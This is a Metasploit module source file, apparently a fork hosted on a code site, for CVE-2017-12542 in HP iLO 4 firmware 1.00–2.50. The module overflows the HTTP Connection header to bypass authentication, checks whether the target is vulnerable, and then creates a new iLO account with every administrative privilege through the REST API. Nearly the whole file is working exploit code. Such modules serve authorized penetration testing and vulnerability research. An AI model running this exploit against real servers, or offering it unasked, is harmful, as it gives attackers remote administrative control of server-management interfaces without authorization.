adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity
Files
31ef5e03b5897a1e32f6d1425e297fde3fa5becb
metasploit-gs/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb
T
adfoster-r7 31ef5e03b5 Improve auxiliary check code messages
2026-04-16 11:22:51 +01:00

119 lines
4.0 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
'Description' => %q{
This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
overflow in the Connection HTTP header handling by the web server.
Exploiting this vulnerability gives full access to the REST API, allowing arbitrary
accounts creation.
},
'References' => [
[ 'CVE', '2017-12542' ],
[ 'BID', '100467' ],
[ 'URL', 'https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-hpesbhf03769en_us' ],
[ 'URL', 'https://www.synacktiv.com/en/publications/hp-ilo-talk-at-recon-brx-2018.html' ]
],
'Author' => [
'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2017-08-24',
'DefaultOptions' => { 'SSL' => true },
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
'Reliability' => []
}
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
]
)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/rest/v1/AccountService/Accounts',
'headers' => {
'Connection' => Rex::Text.rand_text_alphanumeric(29)
}
})
rescue StandardError
return Exploit::CheckCode::Unknown('Failed to connect to the target')
end
if (res.code == 200) && res.body.include?('"Description":"iLO User Accounts"')
return Exploit::CheckCode::Vulnerable('Authentication bypass returned iLO User Accounts')
end
return Exploit::CheckCode::Safe('Authentication bypass did not return account data')
end
def run
print_status("Trying to create account #{datastore['USERNAME']}...")
data = {}
data['UserName'] = datastore['USERNAME']
data['Password'] = datastore['PASSWORD']
data['Oem'] = {}
data['Oem']['Hp'] = {}
data['Oem']['Hp']['LoginName'] = datastore['USERNAME']
data['Oem']['Hp']['Privileges'] = {}
data['Oem']['Hp']['Privileges']['LoginPriv'] = true
data['Oem']['Hp']['Privileges']['RemoteConsolePriv'] = true
data['Oem']['Hp']['Privileges']['UserConfigPriv'] = true
data['Oem']['Hp']['Privileges']['VirtualMediaPriv'] = true
data['Oem']['Hp']['Privileges']['VirtualPowerAndResetPriv'] = true
data['Oem']['Hp']['Privileges']['iLOConfigPriv'] = true
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/rest/v1/AccountService/Accounts',
'ctype' => 'application/json',
'headers' => {
'Connection' => Rex::Text.rand_text_alphanumeric(29)
},
'data' => data.to_json
})
rescue Rex::ConnectionRefused
vprint_error('Connection failed')
end
unless res
fail_with(Failure::Unknown, 'Connection failed')
end
if res.body.include? 'InvalidPasswordLength'
fail_with(Failure::BadConfig, "Password #{datastore['PASSWORD']} is too short.")
end
if res.body.include? 'UserAlreadyExist'
fail_with(Failure::BadConfig, "Unable to add login #{datastore['USERNAME']}, user already exists")
end
unless res.code == 201
fail_with(Failure::UnexpectedReply, "Unknown error while creating the user. Response: #{res.code}")
end
print_good("Account #{datastore['USERNAME']}/#{datastore['PASSWORD']} created successfully.")
end
end
Reference in New Issue View Git Blame Copy Permalink